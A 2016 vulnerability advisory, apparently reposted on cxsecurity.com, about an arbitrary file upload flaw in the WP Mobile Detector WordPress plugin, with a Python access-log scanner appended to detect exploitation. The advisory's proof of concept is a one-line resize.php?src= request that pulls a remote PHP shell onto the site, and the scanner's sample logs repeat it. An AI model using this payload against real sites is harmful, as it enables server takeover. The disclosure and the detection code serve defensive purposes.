WordPress WP Mobile Detector 3.5 Shell Upload *youtube

2016.06.05
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

Hello,

This vulnerability was disclosed to the public yesterday: WP Mobile Detector arbitrary file upload for versions <=3.5, in which an attacker can upload malicious PHP files (shell) into the website. Over 10,000 users are affected. The vendor has released a patch in their versions 3.6 & 3.7 at https://wordpress.org/plugins/wp-mobile-detector/changelog/ . Even Sucuri has published an advisory on it.

I have written a complete POC post: https://aadityapurani.com/2016/06/03/mobile-detector-poc/
I have made a POC video here: https://www.youtube.com/watch?v=ULE1AVWfHTU

Simple POC:

Go to [wordpress site path].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
and it will get saved in the directory /wp-content/plugins/wp-mobile-detector/cache/shell.php

Warm Regards,
Aaditya Purani

References:

https://aadityapurani.com/2016/06/03/mobile-detector-poc/
https://www.youtube.com/watch?v=ULE1AVWfHTU
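
Detection example (added here, not part of the original advisory or the plugin's code): a log scan for the behaviour described above, where resize.php is called with a src value naming a script file and a script is then requested from the plugin's cache/ directory. The combined access-log format, the extension list, the function name scan and the sample lines are assumptions made for illustration.

```python
import re
from posixpath import basename
from urllib.parse import parse_qs, unquote, urlsplit

PLUGIN = "/wp-content/plugins/wp-mobile-detector/"
# Extensions assumed to be executed by the PHP handler; adjust to the server config.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")
# Combined log format: ip, ident, user, [time], "METHOD target PROTO", status
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan(lines):
    """Return (uploads, executions) found in access-log lines."""
    uploads, executions, dropped = [], [], set()
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)
        if path == PLUGIN + "resize.php":
            # The advisory says the fetched file is stored under its own name in cache/.
            for src in parse_qs(url.query).get("src", []):
                name = basename(urlsplit(src).path)
                if name.lower().endswith(SCRIPT_EXT):
                    dropped.add(name)
                    uploads.append((ip, src, status))
        elif path.startswith(PLUGIN + "cache/"):
            name = basename(path)
            if name.lower().endswith(SCRIPT_EXT):
                # Last field: True when the same name was seen in an earlier src=.
                executions.append((ip, name, status, name in dropped))
    return uploads, executions

# Constructed sample lines (documentation IPs and example.* hosts, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [04/Jun/2016:10:00:01 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://files.example.net/shell.php HTTP/1.1" 200 0',
    '203.0.113.7 - - [04/Jun/2016:10:00:05 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php HTTP/1.1" 200 512',
    '198.51.100.9 - - [04/Jun/2016:10:02:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://blog.example.org/uploads/photo.jpg HTTP/1.1" 200 2048',
    '198.51.100.9 - - [04/Jun/2016:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    ups, execs = scan(SAMPLE)
    for u in ups:
        print("script fetched via resize.php:", u)
    for e in execs:
        print("script requested from cache/:", e)
```

Any hit on a site still running version 3.5 or earlier warrants checking the cache/ directory for script files and moving to the patched releases named in the advisory.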


Copyright 2024, cxsecurity.com

 
